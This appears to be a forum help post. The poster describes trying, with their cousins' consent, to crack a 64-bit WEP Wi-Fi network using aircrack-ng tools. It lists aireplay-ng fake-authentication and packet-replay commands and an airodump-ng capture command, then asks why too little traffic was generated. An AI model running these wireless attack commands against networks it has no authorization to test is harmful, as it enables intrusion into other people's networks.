I'm trying to show my cousins how insecure their network is with 64 bit wep but they refuse to believe me. They turned all their PC's off and gave me 2 hours. I thought it would be easy but I failed.
I' used the BT 4 Live CD with a Intel 3945ABG.
I first authenticated with the network using:
I authenticated fine.aireplay-ng -1 3000 -e MyCousinsNetwork -a XX:XX:XX:XX:XX:XX -h XX:XX:XX:XX:XX:XX -o 1 -q 10 wlan0
My next move was to use interactive packet replay because they shut their PC's down. I would have used injection if they had stayed up and were generating traffic. So I entered this command:
When I do anaireplay-ng -2 -b XX:XX:XX:XX:XX:XX -h XX:XX:XX:XX:XX:XX -c FF:FF:FF:FF:FF:FF -p 0841 wlan0I see myself as authenticated on the network.airodump-ng -w COUSINS --bssid XX:XX:XX:XX:XX:XX -c 8 wlan0
These commands did not generate enough traffic at all in 2 hours.
So did I do anything wrong or is it just my wireless card?


